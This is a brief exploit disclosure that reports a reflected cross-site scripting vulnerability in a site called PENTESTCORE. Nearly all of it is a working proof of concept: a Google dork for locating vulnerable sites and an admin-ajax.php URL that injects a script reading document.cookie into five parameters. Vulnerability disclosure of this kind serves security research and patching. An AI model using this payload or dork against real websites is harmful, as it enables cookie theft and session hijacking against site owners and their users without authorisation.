****************************
#Exploit Title: PENTESTCORE - Cross Site Scripting Vulnerability (XSS)
#Date: 2020-10-01
#Exploit Author: Mahdi Karimi
#Vendor Homepage: https://pentestcore.com
#Google Dork: "Powered by Pentestcore"
#Tested On: Windows 10

Proof of Concept:

Search Google Dork: "Powered by Pentestcore"

https://pentestcore.com/wp-admin/admin-ajax.php?action=%3Cscript%3Eprompt%28document.cookie%29%3C%2Fscript%3E&post_id=%3Cscript%3Eprompt%28document.cookie%29%3C%2Fscript%3E&nonce=%3Cscript%3Eprompt%28document.cookie%29%3C%2Fscript%3E&is_comment=%3Cscript%3Eprompt%28document.cookie%29%3C%2Fscript%3E&disabled=%3Cscript%3Eprompt%28document.cookie%29%3C%2Fscript%3E

**************************************************
#Discovered by: Mahdi Karimi
**************************************************